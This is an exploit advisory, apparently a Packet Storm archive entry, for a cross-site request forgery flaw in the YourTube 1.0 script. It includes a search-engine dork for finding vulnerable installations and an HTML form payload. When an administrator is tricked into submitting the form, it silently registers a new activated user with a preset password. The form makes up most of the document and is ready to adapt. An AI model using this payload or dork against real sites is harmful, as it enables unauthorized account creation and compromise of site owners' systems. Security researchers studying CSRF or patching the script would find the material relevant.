YourTube 1.0 Cross Site Request Forgery

2011-01-03T00:00:00
ID PACKETSTORM:97217
Type packetstorm
Reporter AtT4CKxT3rR0r1ST
Modified 2011-01-03T00:00:00

Description

                                        
                                            `YourTube v1.0 CSRF Vulnerability (Add User)  
====================================================================  
####################################################################  
.:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]  
.:. Script : http://www.ac4p.com/  
.:. Dork : inurl:"Powered by YourTube v1.0"  
  
####################################################################  
  
===[ Exploit ]===  
  
<form method="POST" name="form0" action="http://localhost/card/admincp/users.php">  
<input type="hidden" name="action" value="Register"/>  
<input type="hidden" name="vusername" value="user1"/>  
<input type="hidden" name="vpass" value="123456"/>  
<input type="hidden" name="email" value="user1@hotmail.com"/>  
<input type="hidden" name="gender" value="m"/>  
<input type="hidden" name="country" value="palestine"/>  
<input type="hidden" name="altoge" value="My signature"/>  
<input type="hidden" name="activated" value="1"/>  
</form>  
  
</body>  
</html>  
  
####################################################################  
  
`